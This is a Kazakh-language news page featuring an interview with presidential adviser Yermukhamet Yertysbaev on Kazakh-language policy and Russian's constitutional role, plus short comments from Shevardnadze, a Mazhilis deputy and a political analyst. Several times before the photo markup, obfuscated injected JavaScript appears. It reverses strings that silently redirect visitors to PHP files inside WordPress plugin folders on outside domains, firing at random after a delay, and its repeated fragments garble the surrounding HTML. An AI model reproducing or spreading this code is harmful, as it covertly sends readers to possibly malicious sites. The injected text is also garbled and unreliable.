2024-07-27

Ермұхамет ЕРТІСБАЕВ: Қазақ тілі үшін қолымды шауып беруге даярмын

  $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to; margin-right: autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to;» src=»http://www.baq.kz/fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to/434_38ae0b8ee44eb90cd8caa0d6962027cd.jpg» title=»Ермұхамет ЕРТІСБАЕВ: Қазақ тілі үшін қолымды шауып беруге даярмын | Жаңалықтар | «Baq.kz» Ақпараттық портал» alt=»Ермұхамет ЕРТІСБАЕВ: Қазақ тілі үшін қолымды шауып беруге даярмын | Жаңалықтар | «Baq.kz» Ақпараттық портал» /> 

Қазақстан Президентінің саяси мәселелер жөніндегі кеңесшісі Ермұхамет Ертісбаевты бірқатар қоғамдық ұйым өкілдері «қазақ тілін дамытуға кедергі келтіріп отыр» десе, саясаткер өзін «қазақ тілі — халықаралық тіл деп жүрген жалғыз қазақпын» деп санайды.

— Президент Нұрсұлтан Назарбаев «Барлық қазақстандықтарды біріктіретін басты фактор ретінде қазақ тілін әрі қарай дамыту үшін бар күш-жігерімізді салуымыз керек!» деген болатын. Неліктен ең алдымен Президенттің кеңесшісі — сізге қазақ тілінің дамуына кедергі келтіретіндерге берілетін «Шіріген жұмыртқа» сыйлығы бұйырды?
— Митингіге шыққандар маған осылай шүйліккісі келді. Өйткені мен ел алдына көп шығамын. Басқа министр, басшылардан өзгешелігім де сол: үндемей отырмаймын. Жалғыз өзім осы мәселе туралы айтамын. Мен әрдайым «Қазақ тілін дамыту керек» деп келдім. Қазақстанда қазақ тіліне қарсы бірде-бір адам жоқ! Бірақ тілді мына жағдайда орыс тілін кемсітіп, шектеу арқылы дамытуға болмайды. Мұхтар Шаханов пен оның жақтастары солай деп отыр емес пе?! Мен сізге ашық айтайын, бұл соғысқа әкеледі. Нағыз соғысқа! Молдовада 1992 жылы тіл мәселесіне қатысты қан төгілді. Әлі күнге дейін Молдова екіге жарылған: Молдова және Приднестровье. Егер Шаханов жағдайдың осылай өрбігенін қаласа, онда бұған ол қол жеткізе алады. Қазақстанның 5 солтүстік облысында жағдайдың күрт ушығатынын ашық айтамын. Орыстармен сөйлесемін. Олар: «Біз үндемейміз. Бірақ біз де митинг жасай аламыз» дейді. Сонда не болады? Бұл неге әкеледі?
Қазақ тілін басқаша дамытуымыз керек. Бұл жерде менің қандай қатысым бар? Сонда қалай, бір ғана адам — мен Қазақстандағы мемлекеттік тілдің дамуына кедергі келтіріп отырмын ба? Бұл не деген ақымақтық?! Таңғаламын! Егер маған: «Өз қолыңды шауып тастасаң, ертең барлық он алты миллион, оның ішінде орыстар да қазақша сөйлейді» десе, тіпті ойланбастан өз елім, халқым, болашақ үшін соны жасар едім. Бірақ мәселе онда емес, одан да күрделі екені мәлім.
Жиырма жыл бойы қазақтарды ғана емес, бүкіл Қазақстан азаматтарын селт еткізер бір шығарма жаза алмаған Мұхтар Шахановқа немесе басқа ақын, жазушыларға «Шіріген жұмыртқа» сыйлығын беру керек шығар?! Егер сондай бір әдеби туынды шықса, барлық жұрт соны жапатармағай оқып, қазақ тілін үйрене бастамай ма?! Бәлкім, жастарды баурап алатын пьеса, драма, киносценарийлер жаза алмай отырған зиялы қауым кінәлі болар?! Әлде, бізге тілді сіңіре алмаған аға ұрпақ көбірек жазықты ма?!
Ана тілі — ананың тілі! Иә, көптеген қазақтар бала кезінен орыс тілінде сөйлейтін жағдайды бастан өткердік. Бұл — трагедия! Орыстандыру Қазақстанда өте күшті болды. Сондықтан соңғы жиырма жылда қазақ тілді ортаны құрып отырмыз. Жүздеген мың адам қазақ тілін үйренуге, оны өркендетуге жұмылдырылды.
— Сіз жаңа орыс тілін шектеу қанды қақтығысқа әкелетінін айттыңыз. Бірақ Грузияда 1978 жылы Эдуард Шеварнадзенің тұсында грузин тілін мемлекеттік тіл ретінде қалдыру талабымен жастар көшеге шыққан. Оларды зиялы қауым қолдап, грузин басшылығы мойынсұнды. Ақыры Кеңес Одағының құрамындағы Грузияға Мәскеу орыс тілін сол күйі енгізе алмады ғой?! Ал Қазақстанның тәуелсіздік алғанына жиырма жыл!
— Грузияда оны жасау оңай болатын. Өйткені ондағы халықтың 99,5 пайызы — грузиндер. Бізде оған бару қиын. Қазақстанда миллион орыс тұрады! Оған қоса, 130 басқа ұлт өкілдері де бар. Өзіңіз байқағандай, интернетте бұл тақырып бойынша оқырмандардың жүздеген, мыңдаған пікірлері шықты.
— Сіз меңзеп отырған zakon.kz, zonakz.net сайттары мемлекеттік тіл мәселесіне келгенде біржақты кетеді. Тіпті кейбір әріптестерім осы тақырып бойынша zakon.kz сайтында пікір қалдырғысы келгенде, олардың пікірлері жарияланбапты…
— Онда маған қарсы да, мені қолдайтын пікірлер де бар. Өте көп!
— Егер сіз қазақ сайттарына кірсеңіз, онда мүлдем басқаша пікірлерді оқыр едіңіз.
— Сонымен, мен бұл сұраққа жауап бердім. Келесі сауал қандай?
— Сіз мемлекеттік тіл мәселесі «саусақтан сорып» жасалған деп есептейсіз. Бірақ онда неге Қазақстанның әлеуметтік экономикалық болжау институты (20 ақпан, 2011 жыл), Қазақстанның стратегиялық саяси зерттеулер институты (Т.Козырев, «Айқын», 11 мамыр, 2011 жыл) мамандары әлеуметтік зерттеулерге сүйене отырып, басқаша тұжырым жасайды? Олар тіл мәселесін этносаралық қарым-қатынастағы негізгі мәселе ретінде қарастырып, оның қақтығысқа әкелетін әлеуеті бар екендігіне нұсқайды. Зерттеушілер наразылықтың басқа ұлттардың емес, дәл қазақ ортасына тән екендігін көрсетіп отыр. Ал соңғы санақ нәтижесі бойынша қазақ тілін халықтың 65 пайызы меңгерген…
— Шынымен, тіл Қазақстандағы әлеуметтік бөліну мен әлеуметтік қарым-қатынастардың ушығуының детонаторына айналуы мүмкін. Өйткені көптеген қазақтар, әсіресе ауылдан шыққандар Батыс университеттерін бітіріп, «Болашақ» бағдарламасымен оқыған жоқ қой. Ағылшын тілін білмейді. Жоғары жалақы алатын жұмыс жоқ. Кәсіби біліктілігі жеткіліксіз. Бұл — күрделі мәселе. Оны шешу үшін олар оңай жол таңдады. Басқа тілдерді, орыс тілін шеттетіп, өзіне жаңа әлеуметтік мәртебе жасағысы келеді. Мұндай жолдың қайда апаратыны белгісіз. Қазақ тілін тек қана бәсекелестік арқылы жетілдіре аламыз. Мен шынын айтқанда, мәселе көріп тұрған жоқпын! Барлық қазақтар билікте емес пе?! Елімізде 65 пайыз қазақ болса, мемлекеттік орындарда 99 пайыз қазақ отыр. Біз қазақ тілін үйренушілерге ірі ақшалай жүлде тағайындайтындай олимпиада, байқаулар ұйымдастырып, соған лайық республикалық, облыстық бюджеттер қабылдай аламыз. «Назарбаев университетін» аштық. Қазір Ұлттық қорда 75 миллиард доллар бар. Қане, енді қазақ тілін зерттейтін ең бір мықты университет ашайықшы. Онда ең үздік кадрлар дайындайық. Бәрі — қазақтың қолында емес пе?! Қандай мәселе бар? Жоқ, ең бір ақылға сыйымсыз әрі жеңіл жолын таңдап алған. Конституциядан орыс тілін алып тастаса, бәрі қазақша үйрене бастайтындай. Ешкім де оқымайды! Бәрі керісінше шығады!
— Жиырма жыл бойы сол байқауларды өткізіп келеміз. Бірақ қазіргі жағдай қалай? Өзінің ана тілін қорғау бойынша өз елінде митинг өткізу Қазақстандағы мемлекеттік тілдің жиырма жылдағы мүшкіл халін паш етпей ме?!
— Жаманды ғана емес, жақсыны да көре білейік. Жиырма жыл аралығында бұрын болмаған мықты қазақтілді ортаны қалыптастырдық. Телевидениені, баспа ісін, қазақша газеттер мен сайттарды алып қараңыз. Жақында Канададан бұрын университетте бірге оқыған бір жолдасым келді. Сонда ол осында балалардың әнұран шырқап, қазақша тақпақ айтқанын көріп, таңдай қақты. Жиырма жыл бұрын мұның бірде біреуі болған жоқ қой! Сондықтан митингіге мүлдем мән беріп қажет емес!
— Мемлекеттік тілді дамытудағы «орасан зор табыстар» туралы айтқанда сондайсыздар, неге қарапайым фактілерге келгенде үнсіз қаласыздар? Мәселен, Білім және ғылым министрлігінің деректері бойынша, Қазақстанда әлі күнге дейін мемлекеттік тілдегі бірде-бір мектебі жоқ қалалар бар. Павлодарда қазақ мектебі (10%) жетіспегендіктен, азаматтар өз балаларын қазақша оқыта алмай жүр. Қостанай, Петропавл, Теміртау, Лисаковск, Риддер, Шахтинск және тағы басқа қалаларда да жағдай соған ұқсас…
— Бұл кадр жетіспеуінен туындап отыр.Сталиннің: «Кадр бәрін шешеді» деген ұраны өте өзекті. Өйткені барлық салада, бизнесте, мемлекеттік органдарда, газеттер, телевизия, гуманитарлық, өндіріс салаларында кадр сұмдық жетіспейді! Сіз дұрыс көрсетіп отырғандай, солтүстік қалалаларда мұғалімдер тапшы. Сондықтан мемлекеттік бағдарлама керек. Астана мен Алматыда қазақ тілін зерттейтін өте күшті екі университет ашып, сонда мамандар әзірленуі тиіс. Бұл үшін осы мәселені депутаттар көтеріп, Білім және ғылым министрлігі оны дұрыстап қарап, ең бір талантты жастарды жинап, оны әзірлеуге кірісу керек. Кеңес Одағы кезінде Қыздар педагогикалық институты ашылып, әр облыста педагог кадрлар әзірлейтін жоғары оқу орны болды емес пе?! Сондықтан бұл — мемлекет мұқият зерделейтін мәселе.
— Неліктен ағылшыншаға судай, тіпті қытайша сөйлейтін біздің шенеуніктеріміз тәуелсіздігіміздің жиырма жылында мемлекеттік тілді сол күйі үйрене алмай-ақ қойды? Яғни бұл олардың мемлекеттік тілдің болашағынан күдер үзгенін көрсетпей ме?
— Керісінше, егер мансап қуғысы келген адам қазақ тілін еркін білмейінше, жоғары көтеріле алмайтындығын жақсы біледі. Екінші жағынан олар елдің тәуелсіздігін отыз, қырық жастарында қарсы алды емес пе?! Осы жаста қазақ тілін Мұхтар Шаханов, Әбіш Кекілбаев сияқты еркін меңгеру мүмкін емес. Мен көптеген шенеуніктермен араласамын. Той-томалақтарда, ас берген кезде, түрлі мерекелік шараларда… Мысалы, нақты мені алайықшы.
— Иә, сіз неліктен қазақ тілін әлі үйрене алмай жүрсіз?
— Мен мемлекеттік тілді әлсіз меңгергенмін. Оны ашық мойындаймын. Бірақ Мәдениет және ақпарат министрі болып істедім. Сол кездегі мұрағатымды қарап отырсам, 150-дей қазақша сұхбат беріппін. Кейде телевизиядағы мониторды пайдаландым. Сегіз рет коллегия өткізіп, онда тек қана қазақ тілінде баяндама жасадым. Өйткені залда өңкей қазақтар отырғанда, қалай орыс тілінде баяндама оқимын?! Сондықтан таңғы 6-дан екі сағат бойы оқытушыдан арнайы сабақ алдым. Қазір сондай серпіліс жоқ, аппаратым да, адамдарым да жоқ. Басқа шенеуніктер де сөйтеді. Орыс тілі — әлемдік тілдің бірі. Ол білім беру, бизнес, ғылым, техника тіліне айналды. Ұғымдық аппарат та — негізінен орыс тілінде.
— Сонда шенеуніктер қашан қазақша сөйлейді? Сіздер үшін «мемлекеттік қызметкерлердің бәрі қазақ тілін білуі керек» деген талап енгізген жөн шығар?
— 2004 жылы депутаттар «Мемлекеттік қызмет туралы» заңды қабылдау барысында болуы керек, оншақты лауазымдарды тізіп шығып, олардың қазақ тілін білуі керектігі туралы бастама көтерді. Сонда Конституциялық Кеңес оны Конституцияға сай емес деп тапты. Өйткені негізгі заңда «Қазақ тілін Мемлекет басшысы, Парламенттің Сенаты мен Мәжілісінің төрағалары еркін меңгеруі тиіс» деп көрсетілген. Ал орыс тілінің мемлекеттік орындарда қазақ тілімен бірдей қолданылатындығы жазылған. Министр өз ойын орыс тілінде жеткізу қолайлы деп тапса, сол тілде сөйлей алады. Оны біреу: «Қазақ тілінде сөйле!» деп тартқылай бастаса, онда бұл Конституцияға қайшы келеді. Егер әкімшілік жолмен «қазақ тілінде сөйле» деп талап етсек, онда негізгі заңды бұзып, қоғамды дүрліктірген болып шығамыз. Ал материалдық жағынан ынталандыру, университеттер ашу, заңдық-құқықтық салада өте күшті басқа мотивацияларды пайдалану арқылы жүрсек, онда екі-үш айда жағдай өзгере бастайды. Ешкім үгіттемесе де, орыстар да, «шала қазақтар» да, басқа ұлт өкілдері де қазақ тілін үйренуге кіріседі. Олар жағдайдың өзгергенін, ақшаның жолда жатпайтындығын түсінеді.
Бізде бәрі ұмытып кететін бір нәрсе бар: ол — нарықтық экономика. Нарықтық экономикада тек нарықтық заң жұмыс істейді, жоғарыдан берілетін әкімшілік-командалық, әсіресе тыйым салатын тәсілдер жарамсыз. Қазақ тілі Шаханов ұсынғандай әкімшілік жолмен емес, таза бәсекелестікте жеңіп шығатындай жағдай жасау керек. Мысалы, «Қазақстан» телеарнасы толығымен қазақ тілінде хабар таратады. Неге оны ең көп көрілетін телеарна етіп, онда ең көп жарнама шығатындай жасамасқа?! Сол кезде телеарна өзі ақша тауып, қызықты хабарлар шығарады, бастапқы кезде оны ең құрығанда барлық қазақтілді телекөрермендер тамашалайтын болады. Сценарий жазушылар да, актерлер де, тележүргізушілер де, бәрі осы телеарнаға қарай жүгіріп, осында жұмыс істеуді армандай бастайды. Сонда ол басқа қазақтілді, орыстілді телеарналармен, тіпті ресейлік телеарналармен шынайы бәсекеге түседі. Сол сияқты жазушылықта, поэзияда, балалар әдебиетінде, өндірісте, шағын және орта бизнесте, қайда болсақ та, қазақтар бәсекеге қабілеттілігімізді көрсетуіміз керек.
Маған «Шіріген жұмыртқа» сыйлығын беріпті. Ал мен: «Қазақ тілі — халықаралық тіл» деп жүрген жалғыз қазақпын! Себебі қазақ тілінде қырғыз, өзбек, түрікмен, әзірбайжан, түріктермен сөйлесуге болады. Түркі тілдес аудитория — 200 миллион адам! Осыны барлық жерде айту керек. Яғни қазақ тілінде республикалық, халықаралық жиындар өткізе аламыз.
— Онда неге соны ұйымдастырмайсыздар?
— Егер менде шынайы билік болса, онда ондаған, жүздеген жиындар өткізер едім. Орыстар арасында: «Сіздер Қазақстанды «Отаным» деп танып, азаматтық алдыңыздар, онда өз балаларыңызды оқуға ынталандырыңыздар!» деп насихат жүргізер едік. Ал әкімшілік әдістер керек емес. Олар тек соғысқа әкелетініне нық сенімдімін.

ТАҚЫРЫПҚА ОРАЙ

Эдуард ШЕВАРНАДЗЕ, Грузияның бұрынғы президенті: Грузин тілін сақтап қалдым
 $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/15.10.11/3-bet-Shevarnadze.jpg» height=»160″ width=»128″ />

— Брежневтің тұсында Сусловтың бастамасымен бізге Конституцияның жаңа жобасы ұсынылды. Онда грузин тілінің мәртебесі жойылып кеткен. Сол кезде менің екінші хатшым, өздеріңізге мәлім, Колбин болатын. Мен онымен ақылдасып, Мәскеуге ұшып кеттім. Сусловқа кіріп, грузиндер үшін грузин тілінің не екендігін түсіндіріп бақтым. Егер грузин тілінің мәртебесі жойылса, қан төгілетінін, халық көшеге шығатынын айттым. Оған қоса, ұлттық тілдердің дамуы жөнінде баяндадым. Сусловтан кейін Брежневке кіріп, оған да мәселені түсіндіруге тырыстым. Бірақ ол қайта Сусловқа жіберді. Одан кейін Брежневтің көмекшісі болып есептелетін Черненкоға жолықтым. Ол Брежневпен «жұмыс істеуге» келісті…Тбилисиге оралдым. Айтарлықтай шуды байқамадым. Бірақ көп ұзамай, ең алдымен жазушылар қатты сынға алды. Мен тілдің мәртебесін сақтау бойынша күрес басталатындығына сенімді едім.
Ақыры Саяси кеңестің сессиясы белгіленді. Онда мен тіл мәселесін ең соңғы мәселе етіп қойдым. Қандай реакция болатындығын сеземін. Маған ең жақын отырған Колбин еді. Оның маған кез келген хатты беріп жіберуге мүмкіндігі бар. Алғашқы қағаз келіп түсті: «Университеттен жастар келе жатыр». Екіншісі: «Профессорлар наразы», үшіншісі: «Студенттер Опера театрына жақындады», төртінші қағаз түскен жоқ. «Дадаена!» («Ана тілі!») деген айғай келіп жетті… Мен баяндамамның соңына жеттім: «Конституция жобасында грузин тілінің мәртебесі жойылып кетті» дедім де, әрі қарай: «Грузин тілінің мәртебесін сақтауды ұсынамын!» дедім. Барлық ел ду қол шапалақтады. Көзіне жас алмаған бір адам қалмады. Осылай 15 минут жалғасты. Олар басқа нәрсені күткен еді… Мен Лениннің, Сталиннің кезінде жағдайдың қалай болғанын еске түсірдім. Сосын балконға шығып: «Естідіңіздер ме?» дедім. Көшеге шықтым да: «Мемлекеттік тіл — грузин тілі болады!» дедім. Қалың жұрт шаттанып, менімен ере жүрді. Ақыры біртіндеп ел тарқады. Мен қайта Парламентке оралғым келді. Парламент жанында — қаптаған танкілер. Мен таңғалдым. Маған: «Танкілерді үкіметті қорғау үшін алдырды» деді…
Мені Мәскеуге шақыртатынына сенімді едім. Айтқандай-ақ Суслов Саяси бюроға ұсақ әріптермен жазылған баяндама әзірлепті. Онда «Грузия үкіметі СОКП-ға қарсы!» деп көрсетілген. Мен: «Митингіде жүзден астам жастың қаны төгілген 1956 жыл оқиғасының бетін алдым» дедім… Грузин тілінің мемлекеттік тіл мәртебесі қалдырылды. Осыдан кейін Армения да өз тілдерінің мәртебесін қалпына келтірді. Ал қалған кеңес елдері ол кезде орыс тілін мемлекеттік тіл ретінде қабылдап қойған. (Э.Шеварнадзенің «Айқын» газетіне берген сұхбатынан алынды, 2008 жыл)

Розақұл ХАЛМҰРАДОВ, Парламент Мәжілісінің депутаты: Міндеттеуіміз керек!
 $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/15.10.11/3-bet-Halmuratoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dov.jpg» height=»130″ width=»113″ />
— Егер «орыс тілі мемлекеттік тілмен тең, қатар қолданады» дегенді жойып жіберсек, соғыс болып кетеді деген дұрыс емес! Бірақ сол өзгерістер бізге керек пе? Оны ақылға салып, ойлану керек. Топ менеджерлердің, шетелде оқып келгендердің көпшілігі қазақ тілін әзірге жақсы білмейді. Біз олардың бәрін шеттетіп тастасақ, олар басқа жаққа кетуі керек пе?! Бәлкім, оларға әлі мүмкіндік беру керек шығар?
Ал Үкіметте істегісі келетін әр азамат мемлекеттік тілді білуі керек. Кез келген елде солай. Ресейде орыс тілін білмейтін адам мемлекеттік мекемеде жұмыс істей ала ма?! Оны ешкім жұмысқа да алмайды. Сондықтан мәселен, «Мемлекеттік қызмет туралы» заңға өзгеріс енгізіп, 2014-2015 жылдан бастап, «Мемлекеттік қызметке алынатындар мемлекеттік тілді өзінің біліктілік талабына сай білуі тиіс» деген мәселені қою керек. Сонда бұл ешкімнің құқығын шектемейді. Мемлекеттік тілді білгісі келмесе, онда кәсіпкерлікпен немесе басқа жұмыспен айналыссын. Оларға ешқандай зорлық жоқ қой! «Мемлекеттік қызметке келгің келсе, онда мемлекеттік тілді біл!» деп міндеттеуміз керек. Осындай талап қойылса, мемлекеттік тілді үйренуге деген қажеттілік туады.

Айдос САРЫМ, саясаттанушы: Біз санамызды тазартудамыз

 $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/15.10.11/3-bet-Aitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dos-S.jpg» height=»153″ width=»113″ />
— Алматыда митингіге шыққандардың бірде біреуі де орыс тіліне қарсы сөз айтқан емес. Олар «Қазақ тілін Конституцияда көрсетілген дәрежесіне көтеру керек» деп отыр. Митингке қатысқандардың, оның сыртында жүрген миллиондаған қазақтың арманы — орысты кемсіту, оларды елден қуу емес, керісінше, мемлекеттің бірлігін арттыру. Себебі Қазақстан қауымының «қазақтілді және орыстілді әлем» болып, екіге бөлінуінің өзі көптеген мемлекеттік мәселелердің шешілмеуіне әкеліп отыр емес пе?! Қазақстандағы кейбір орыстілділер «өзінің президентін Путин, Медведев» дейтін дәрежеге жеттік қой.
Қазіргі қолданыстағы тіл туралы заң кеңес заманында қабылданған. Қазақтар ол кезде өзінің жерінде ұлттық азшылық жағдайында өмір сүрді. Сол кезден бері қанша заман өзгерді?! Бірақ ойын ережесі — сол қалпында. Баяғы үрей, күдік пен жалпақшешейліктен арыла алмай отырмыз. Қазір «25 пайыз орыстілділер көтерілсе не болады?» деп қорқытады. Ал қалған 75 пайыз халықты кім ойлайды?! Халықтың басым көпшілігі наразы бола тұра, ұлттық азшылықтың мәселесін айту дұрыс па?! 1960 жылдары көптеген Африка, Азия елдері тәуелсіздік алған. Үндістан, Алжир, Тунис, Малайзия елдері дәуірімен өлшейтін болсақ, біз 80-жылдарда өмір сүріп жатқандаймыз. Кезінде жергілікті халыққа да: «Ағылшын, француз тілдері болмаса, құрисыңдар!» деген уәж айтқан. Малайзия сияқты елдерде ұлттық азшылық болғандарына қарамастан, олар өз тілдерін жоғары дәрежеге шығарды. Израиль баяғыда жойылып кеткен тілдерін қайта жаңғыртып, мемлекеттік тілге айналдырып отыр…
Қазақстанда қазір отаршылдықтан арылу үдерісі жүріп жатыр. Біз санамызды, тарихымызды тазартудамыз. Қазақ тілін шынайы мемлекеттік тіл етіп нығайтып, оны қоғамдық, саяси салада орнына келтірмейтін болсақ, шын мәнінде толыққанды мемлекетке айнала алмаймыз. Мемлекеттік тілді енгізу — мемлекеттігімізді нығайтудың жолы.

Бетті дайындаған
Айжан КӨШКЕНОВА

http://www.aikyn.kz/index.php?option=com_content&task=view&id=10405&Itemid=2

http://kyzmet-gazeti.kz/{jcomments on}

Яндекс.Метрика